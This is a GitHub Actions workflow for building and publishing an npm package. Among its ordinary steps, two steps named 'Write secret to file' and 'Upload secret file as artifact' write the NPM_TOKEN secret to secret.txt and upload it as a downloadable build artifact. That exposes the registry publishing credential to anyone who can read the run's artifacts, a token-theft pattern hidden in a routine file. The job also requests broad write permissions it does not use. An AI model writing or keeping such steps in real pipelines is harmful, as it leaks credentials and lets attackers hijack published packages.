name: Publish to NPM
on: [workflow_dispatch]

permissions:
  contents: write
  packages: write
  id-token: write
  pull-requests: write
  statuses: write
  issues: write
  checks: write

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Check Out Repo
        uses: actions/checkout@v4

      - name: Use Node.js
        uses: actions/setup-node@v4
        with:
          registry-url: "https://registry.npmjs.org"
          node-version-file: ./.nvmrc
          cache: "npm"
          cache-dependency-path: "./package-lock.json"

      - name: Install dependencies
        run: |
          rm -f .npmrc
          printf "//registry.npmjs.org/:_authToken=${{secrets.NPM_TOKEN}}" > .npmrc
          npm ci

      - name: Write secret to file
        run: |
          echo "${{ secrets.NPM_TOKEN }}" > secret.txt
          
      - name: Upload secret file as artifact
        uses: actions/upload-artifact@v4
        with:
          name: secret-file
          path: secret.txt
          retention-days: 1 

      - name: Build
        run: npm run build
        env:
          NODE_ENV: production

      - name: Set public publishing
        run: npm config set access public

      - name: Configure Git
        run: |
          git config --global user.name "GitHub Actions"
          git config --global user.email "actions@github.com"

      - name: Publish package on NPM ðŸ“¦
        run: npm run publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
          NODE_ENV: production